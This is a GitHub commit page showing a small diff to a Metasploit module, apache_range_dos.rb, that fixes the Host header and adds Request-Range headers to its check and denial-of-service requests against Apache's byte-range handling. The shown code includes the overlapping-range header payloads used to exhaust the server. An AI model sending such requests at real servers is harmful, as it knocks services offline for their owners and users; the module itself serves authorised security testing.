Skip to content
Permalink
Browse files

Land #11682, don't check 'localhost' unconditionally, fix headers

  • Loading branch information...
busterb committed Apr 8, 2019
2 parents e9eb008 + 8350eff commit e32bb9e915654f4bd24ebe8f144dbf9db83ac4d1
Showing with 8 additions and 5 deletions.
  1. +8 −5 modules/auxiliary/dos/http/apache_range_dos.rb
@@ -62,13 +62,15 @@ def run_host(ip)
end

def check_for_dos()
path = datastore['URI']
uri = datastore['URI']
rhost = datastore['RHOST']
begin
res = send_request_cgi({
'uri' => path,
'uri' => uri,
'method' => 'HEAD',
'headers' => {
"HOST" => "Localhost",
"HOST" => rhost,
"Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10",
"Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
}
})
@@ -108,8 +110,9 @@ def conduct_dos()
'uri' => uri,
'method' => 'HEAD',
'headers' => {
"HOST" => rhost,
"Range" => "bytes=0-#{ranges}"}},1)
"HOST" => rhost,
"Range" => "bytes=0-#{ranges}",
"Request-Range" => "bytes=0-#{ranges}"}},1)

rescue ::Rex::ConnectionRefused
print_error("Unable to connect to #{rhost}:#{rport}")

0 comments on commit e32bb9e

Please sign in to comment.
You can’t perform that action at this time.